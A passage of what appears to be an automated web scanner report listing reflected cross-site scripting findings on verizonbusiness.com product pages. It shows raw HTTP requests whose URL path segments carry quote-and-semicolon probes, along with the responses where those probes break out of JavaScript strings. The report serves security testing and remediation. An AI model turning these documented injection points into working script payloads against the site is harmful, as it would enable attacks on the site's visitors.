<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/contact-center9e288';eb8b904ab32/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.42. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e9a"%3bf9a14e6c415 was submitted in the REST URL parameter 3. This input was echoed as f3e9a";f9a14e6c415 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/contact-centerf3e9a"%3bf9a14e6c415/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
i="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/contact-centerf3e9a";f9a14e6c415/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.43. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad22'%3b3de738e46d4 was submitted in the REST URL parameter 1. This input was echoed as 1ad22';3de738e46d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1ad22'%3b3de738e46d4/communications/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products1ad22';3de738e46d4/communications/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.44. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63c4c"%3b7236e4cda84 was submitted in the REST URL parameter 1. This input was echoed as 63c4c";7236e4cda84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products63c4c"%3b7236e4cda84/communications/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40666
Date: Wed, 17 Nov 2010 00:44:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products63c4c";7236e4cda84/communications/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.45. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56940"%3b303ea88508d was submitted in the REST URL parameter 2. This input was echoed as 56940";303ea88508d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications56940"%3b303ea88508d/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications56940";303ea88508d/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.46. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce46d'%3b78d243a9c42 was submitted in the REST URL parameter 2. This input was echoed as ce46d';78d243a9c42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsce46d'%3b78d243a9c42/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsce46d';78d243a9c42/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.47. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef4ff"%3b4d41ee83708 was submitted in the REST URL parameter 3. This input was echoed as ef4ff";4d41ee83708 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/emergencyef4ff"%3b4d41ee83708/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43476
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/emergencyef4ff";4d41ee83708/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.48. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 373c0'%3b2b9a291dace was submitted in the REST URL parameter 3. This input was echoed as 373c0';2b9a291dace in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/emergency373c0'%3b2b9a291dace/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43478
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/emergency373c0';2b9a291dace/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.49. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe88b'%3b8bd8495a52e was submitted in the REST URL parameter 1. This input was echoed as fe88b';8bd8495a52e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfe88b'%3b8bd8495a52e/communications/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsfe88b';8bd8495a52e/communications/ip-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.50. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f1d"%3ba7a15a8513 was submitted in the REST URL parameter 1. This input was echoed as e5f1d";a7a15a8513 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse5f1d"%3ba7a15a8513/communications/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productse5f1d";a7a15a8513/communications/ip-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.51. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a365'%3b0ddb097a2 was submitted in the REST URL parameter 2. This input was echoed as 1a365';0ddb097a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications1a365'%3b0ddb097a2/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications1a365';0ddb097a2/ip-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.52. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4194a"%3b2625f85d351 was submitted in the REST URL parameter 2. This input was echoed as 4194a";2625f85d351 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications4194a"%3b2625f85d351/ip-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications4194a";2625f85d351/ip-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.53. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b406"%3b1b48f2f8d17 was submitted in the REST URL parameter 3. This input was echoed as 4b406";1b48f2f8d17 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ip-telephony4b406"%3b1b48f2f8d17/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/ip-telephony4b406";1b48f2f8d17/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.54. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ip-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e393e'%3b5bc61607e6b was submitted in the REST URL parameter 3. This input was echoed as e393e';5bc61607e6b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ip-telephonye393e'%3b5bc61607e6b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
